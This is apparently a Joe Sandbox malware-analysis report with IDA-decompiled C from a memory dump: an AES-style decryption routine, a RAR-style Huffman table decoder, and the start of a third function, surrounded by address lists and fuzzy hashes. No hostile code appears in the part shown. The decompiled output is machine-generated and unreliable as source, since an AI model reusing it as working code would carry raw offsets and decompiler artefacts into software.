0x010205be
0x01020593
0x0102059c
0x00000000
0x00000000
0x00000000
0x0102059c
0x01020571
0x0102057a
0x00000000
0x00000000
0x00000000
0x0102057a
0x010204ce
0x010204d0
0x010204e8
0x010204f0
0x010204f2
0x0102050a
0x01020512
0x01020514
0x0102052c
0x01020534
0x01020536
0x0102053f
0x0102053f
0x00000000
0x01020536
0x0102051d
0x01020526
0x00000000
0x00000000
0x00000000
0x01020526
0x010204fb
0x01020504
0x00000000
0x00000000
0x00000000
0x01020504
0x010204d9
0x010204e2
0x00000000
0x00000000
0x00000000
0x010204e2
0x01020437
0x01020439
0x01020451
0x01020459
0x0102045b
0x01020473
0x0102047b
0x0102047d
0x01020495
0x0102049d
0x0102049f
0x010204a8
0x010204a8
0x00000000
0x0102049f
0x01020486
0x0102048f
0x00000000
0x00000000
0x00000000
0x0102048f
0x01020464
0x0102046d
0x00000000
0x00000000
0x00000000
0x0102046d
0x01020442
0x0102044b
0x00000000
0x00000000
0x00000000
0x0102044b
0x010203a0
0x010203a2
0x010203ba
0x010203c2
0x010203c4
0x010203dc
0x010203e4
0x010203e6
0x010203fe
0x01020406
0x01020408
0x01020411
0x01020411
0x00000000
0x01020408
0x010203ef
0x010203f8
0x00000000
0x00000000
0x00000000
0x010203f8
0x010203cd
0x010203d6
0x00000000
0x00000000
0x00000000
0x010203d6
0x010203ab
0x010203b4
0x00000000
0x00000000
0x00000000
0x010203b4
0x01020309
0x0102030b
0x01020323
0x0102032b
0x0102032d
0x01020345
0x0102034d
0x0102034f
0x01020367
0x0102036f
0x01020371
0x0102037a
0x0102037a
0x00000000
0x01020371
0x01020358
0x01020361
0x00000000
0x00000000
0x00000000
0x01020361
0x01020336
0x0102033f
0x00000000
0x00000000
0x00000000
0x0102033f
0x01020314
0x0102031d
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: bb4037ee19be183c00e0a03e231e14fce5528990de33d6b0a0a742e3e3eaa605
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 44C174362052730AEFAE463D853403FBEE16A916B131A47ADF4F2CB1D9FE20C1649510

Uniqueness

Uniqueness Score: -1.00%

Function 0100E2A0, Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0100E2A0(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				intOrPtr _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x6c);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x24)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x6c) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x38)) = __ecx + 8;
						E0101F4B0(_t431 + 0x5c, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E0101F4B0( *((intOrPtr*)(_t432 + 0x38)), _t432 + 0x58, 0x10);
						}
						_t399 =  *(_t432 + 0x68);
						 *(_t432 + 0x24) = _t399 + 8;
						_t229 =  *((intOrPtr*)(_t432 + 0x78));
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x34)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x28) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x30) = _t359 + _t400 + 0xfffffff8;
							E0100E26E(_t432 + 0x54, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0x10461c0 + (_t402 & 0x000000ff) * 4) ^  *(0x1046dc0 + ( *(_t432 + 0x53) & 0x000000ff) * 4) ^  *(0x10469c0 + ( *(_t432 + 0x56) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x58);
							_t363 =  *(_t432 + 0x10) ^  *(0x10465c0 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t363;
							 *(_t432 + 0x3c) = _t363;
							_t403 =  *(_t432 + 0x50);
							_t368 =  *(0x10465c0 + (_t402 & 0x000000ff) * 4) ^  *(0x10461c0 + (_t403 & 0x000000ff) * 4) ^  *(0x1046dc0 + ( *(_t432 + 0x57) & 0x000000ff) * 4) ^  *(0x10469c0 + ( *(_t432 + 0x5a) & 0x000000ff) * 4);
							 *(_t432 + 0x14) = _t368;
							 *(_t432 + 0x40) = _t368;
							_t404 =  *(_t432 + 0x54);
							 *(_t432 + 0x18) =  *(0x10469c0 + ( *(_t432 + 0x4e) & 0x000000ff) * 4) ^  *(0x10465c0 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x18) ^  *(0x10461c0 + (_t404 & 0x000000ff) * 4) ^  *(0x1046dc0 + ( *(_t432 + 0x5b) & 0x000000ff) * 4);
							 *(_t432 + 0x18) = _t372;
							 *(_t432 + 0x44) = _t372;
							 *(_t432 + 0x1c) =  *(0x1046dc0 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x10469c0 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x1c) ^  *(0x10465c0 + (_t404 & 0x000000ff) * 4) ^  *(0x10461c0 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x1c) = _t376;
							 *(_t432 + 0x48) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x10);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x1c) = _t309;
							_t430 = _t309;
							 *(_t432 + 0x20) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x10) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x18);
								 *(_t432 + 0x1c) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x14);
								_t416 =  *(0x10465c0 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10469c0 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1046dc0 + (_t356 >> 0x18) * 4) ^  *(0x10461c0 + ( *(_t432 + 0x10) & 0x000000ff) * 4);
								 *(_t432 + 0x3c) = _t416;
								 *(_t432 + 0x14) =  *(0x10469c0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1046dc0 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x14) ^  *(0x10465c0 + ( *(_t432 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10461c0 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x14) = _t388;
								 *(_t432 + 0x40) = _t388;
								_t394 =  *(0x1046dc0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0x10465c0 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10469c0 + ( *(_t432 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10461c0 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x18) = _t394;
								 *(_t432 + 0x44) = _t394;
								_t376 =  *(0x10465c0 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10469c0 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1046dc0 + ( *(_t432 + 0x10) >> 0x18) * 4) ^  *(0x10461c0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4);
								_t135 = _t432 + 0x20;
								 *_t135 =  *(_t432 + 0x20) - 1;
								 *(_t432 + 0x48) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t432 + 0x10) = _t416;
							_t415 =  *(_t432 + 0x74);
							 *(_t432 + 0x1c) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x10);
							 *(_t432 + 0x20) = _t253;
							 *(_t432 + 0x4c) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x1c);
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x10450a0));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x18);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x14);
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x10450a0));
							_t423 =  *(_t432 + 0x20);
							 *(_t432 + 0x54) = _t406;
							 *(_t432 + 0x50) = _t350;
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x10450a0));
							 *(_t432 + 0x58) = _t378;
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x10450a0));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t406 >> 0x18) + 0x10450a0));
							 *(_t432 + 0x44) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x45)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x10450a0));
							_t424 = _t423 >> 0x18;
							 *((char*)(_t432 + 0x46)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x47)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x10450a0));
							 *(_t432 + 0x48) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x10450a0));
							_t409 =  *(_t432 + 0x3c) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x49)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x10450a0));
							 *((char*)(_t432 + 0x4a)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x10450a0));
							_t188 = _t424 + 0x10450a0; // 0x30d56a09
							 *((char*)(_t432 + 0x4b)) =  *_t188;
							_t301 =  *(_t432 + 0x48) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x40) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x44) ^  *(_t429 + 0x20);
							 *(_t432 + 0x20) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x5c);
								_t426 = _t426 ^  *(_t432 + 0x60);
								_t353 = _t353 ^  *(_t432 + 0x64);
								 *(_t432 + 0x20) = _t301 ^  *(_t432 + 0x68);
							}
							 *(_t432 + 0x5c) =  *( *(_t432 + 0x30));
							_t304 =  *(_t432 + 0x24);
							 *(_t432 + 0x60) =  *(_t304 - 4);
							 *(_t432 + 0x64) =  *_t304;
							 *(_t432 + 0x68) = _t304[1];
							_t382 =  *(_t432 + 0x28);
							 *(_t432 + 0x24) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x20);
							_t400 =  *((intOrPtr*)(_t432 + 0x34));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x28) = _t359;
							 *(_t432 + 0x74) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E0100E762( *((intOrPtr*)(_t431 + 0x70)), _t415,  *((intOrPtr*)(_t431 + 0x70)));
				}
				return _t222;
			}

0x0100e2a5
0x0100e2a9
0x0100e2ab
0x0100e2b1
0x0100e2b7
0x0100e2be
0x0100e2c2
0x0100e2dd
0x0100e2e6
0x0100e2eb
0x0100e2f0
0x0100e747
0x00000000
0x0100e757
0x0100e2f6
0x0100e2ff
0x0100e303
0x0100e307
0x0100e309
0x0100e30d
0x0100e310
0x0100e314
0x0100e314
0x0100e324
0x0100e331
0x0100e336
0x0100e35c
0x0100e360
0x0100e36b
0x0100e372
0x0100e376
0x0100e37d
0x0100e3a3
0x0100e3af
0x0100e3b3
0x0100e3c1
0x0100e3cc
0x0100e3e3
0x0100e3ef
0x0100e3f3
0x0100e40a
0x0100e41f
0x0100e426
0x0100e427
0x0100e42b
0x0100e432
0x00000000
0x00000000
0x0100e438
0x0100e442
0x0100e445
0x0100e449
0x0100e44b
0x0100e44f
0x0100e454
0x0100e457
0x0100e45b
0x0100e461
0x0100e463
0x0100e467
0x0100e476
0x0100e4a6
0x0100e4b7
0x0100e4c9
0x0100e4e5
0x0100e4ee
0x0100e4f2
0x0100e52b
0x0100e532
0x0100e536
0x0100e563
0x0100e56a
0x0100e56a
0x0100e56f
0x0100e56f
0x0100e579
0x0100e57d
0x0100e581
0x0100e585
0x0100e589
0x0100e58c
0x0100e590
0x0100e594
0x0100e59e
0x0100e5ab
0x0100e5b7
0x0100e5be
0x0100e5c8
0x0100e5d4
0x0100e5d8
0x0100e5dc
0x0100e5e6
0x0100e5ef
0x0100e5f9
0x0100e606
0x0100e618
0x0100e62a
0x0100e639
0x0100e649
0x0100e65e
0x0100e66a
0x0100e673
0x0100e682
0x0100e68f
0x0100e69a
0x0100e6a3
0x0100e6b0
0x0100e6b4
0x0100e6ba
0x0100e6ca
0x0100e6cd
0x0100e6d0
0x0100e6d7
0x0100e6db
0x0100e6dd
0x0100e6e1
0x0100e6e5
0x0100e6ed
0x0100e6ed
0x0100e6f7
0x0100e6fb
0x0100e702
0x0100e708
0x0100e712
0x0100e716
0x0100e71a
0x0100e71e
0x0100e725
0x0100e728
0x0100e72c
0x0100e72f
0x0100e731
0x0100e734
0x0100e737
0x0100e73b
0x0100e73b
0x00000000
0x0100e746
0x00000000
0x0100e2cd
0x0100e75f

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b723eda259920c4715a5e892f6991be0c783e6457206876079fc88c8e66a5f
Instruction ID: e98a06d3b80053ce78f9b38131345ba15addc85bac7402bc90b98b77cc61e3b1
Opcode Fuzzy Hash: e6b723eda259920c4715a5e892f6991be0c783e6457206876079fc88c8e66a5f
Instruction Fuzzy Hash: 5BE14BB95083848FC314CF29D49096ABBF0BF9A300F89095EF5D597352D336E919DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01013A3C, Relevance: .3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E01013A3C(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E0100A7E4(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E0100A7FB(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E0101F350(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E0100A7E4(_t184, 2);
						do {
							 *(_t201 + 0x14) = E0100A7FB(_t184) >> 0x0000000c & 0x000000ff;
							E0100A7E4(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E0100A7FB(_t184) >> 0x0000000c & 0x000000ff;
							E0100A7E4(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E01013076();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E0100A800(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E0100A7FB(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E0100A7FB(_t157) >> 0xd) + 3;
													_push(3);
												}
												E0100A7E4(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E0100A7FB(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E0100A7FB(_t166) >> 0xd) + 3;
												_push(3);
											}
											E0100A7E4(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E0101476C(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E01013076();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E01013076();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E01013076();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E01013076();
							E0101F4B0(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E0101284B(_t178, _t205);
				}
				_t135 = E0101476C(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}

0x01013a3c
0x01013a43
0x01013a4c
0x01013a54
0x01013a63
0x01013a6e
0x01013a75
0x01013a7a
0x01013a7f
0x01013aa4
0x01013aa6
0x01013aac
0x01013ab2
0x01013ab8
0x01013abd
0x01013acc
0x01013ad1
0x01013ad1
0x01013ad8
0x01013ade
0x01013aef
0x01013af3
0x01013af8
0x01013afc
0x01013aff
0x01013b38
0x00000000
0x01013b38
0x01013b0f
0x01013b12
0x01013b17
0x01013b19
0x01013b22
0x01013b22
0x01013b25
0x01013b25
0x01013b26
0x01013b29
0x00000000
0x00000000
0x01013b2b
0x01013b30
0x01013b31
0x01013b33
0x00000000
0x00000000
0x00000000
0x01013b33
0x01013b35
0x00000000
0x01013b35
0x01013b1b
0x01013b3c
0x01013b3c
0x01013b3d
0x01013b3d
0x01013b42
0x01013b44
0x01013b4c
0x01013b51
0x01013b52
0x01013b57
0x01013b57
0x01013b59
0x01013b62
0x01013b64
0x01013b75
0x01013b77
0x01013b7e
0x01013b84
0x01013b8a
0x01013b8e
0x01013bbb
0x01013bbc
0x01013bbd
0x01013bc1
0x01013bc3
0x01013be1
0x01013be4
0x01013bf0
0x01013bf2
0x01013bf6
0x01013bfb
0x01013c08
0x01013c0a
0x01013c0d
0x01013c0f
0x01013c0f
0x01013c11
0x01013c19
0x01013c19
0x01013c1c
0x01013c33
0x01013c36
0x01013c82
0x01013c84
0x01013ca1
0x01013ca1
0x01013ca4
0x01013c86
0x01013c90
0x01013c93
0x01013c93
0x01013ca8
0x01013cad
0x01013cad
0x01013cae
0x01013cb4
0x00000000
0x00000000
0x01013cb6
0x01013cbb
0x01013cbc
0x01013cbe
0x00000000
0x00000000
0x01013cc0
0x01013cc0
0x00000000
0x01013cc0
0x00000000
0x01013cad
0x01013c38
0x01013c3b
0x01013c3d
0x01013c5a
0x01013c5a
0x01013c5d
0x01013c3f
0x01013c49
0x01013c4c
0x01013c4c
0x01013c61
0x01013c66
0x01013c68
0x01013ce3
0x01013ce3
0x01013d62
0x00000000
0x01013c6a
0x01013c6a
0x01013c6a
0x01013c6b
0x01013c71
0x00000000
0x00000000
0x01013c77
0x01013c7b
0x01013c7c
0x01013c7e
0x00000000
0x00000000
0x00000000
0x01013c80
0x00000000
0x01013c6a
0x01013c68
0x01013c29
0x01013c2d
0x00000000
0x01013c2d
0x01013bcc
0x01013bcc
0x01013bce
0x01013bce
0x01013bd0
0x00000000
0x00000000
0x01013bd2
0x01013bd3
0x01013bd6
0x01013bd9
0x00000000
0x00000000
0x00000000
0x01013bdb
0x01013bdd
0x00000000
0x01013bdd
0x01013b92
0x01013b95
0x01013b9f
0x01013ba7
0x01013bac
0x01013baf
0x00000000
0x01013baf
0x01013b68
0x01013b6d
0x01013b6f
0x00000000
0x00000000
0x00000000
0x01013cc6
0x01013cc6
0x01013cc6
0x01013cd2
0x01013cd4
0x01013cdb
0x01013ce1
0x01013ce7
0x01013cf4
0x01013cf9
0x01013cfa
0x01013cff
0x01013d09
0x01013d11
0x01013d12
0x01013d17
0x01013d21
0x01013d29
0x01013d2a
0x01013d2f
0x01013d39
0x01013d41
0x01013d42
0x01013d58
0x01013d60
0x00000000
0x01013d60
0x00000000
0x01013ce1
0x01013a87
0x01013a91
0x01013a92
0x00000000
0x01013a99
0x01013a56
0x01013a5d
0x00000000
0x00000000
0x01013d6c

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: aa985f105ee299e9decf77163ce8e8d71fbb2c16201d1821ce2d5882b31c6ed5
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: 6E9156B020474A8BE725EF68D8D0BFE77D5BB90320F04492DE6DB8B2C5EA78A144C341

Uniqueness

Uniqueness Score: -1.00%

Function 01024969, Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 83%

			E01024969(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
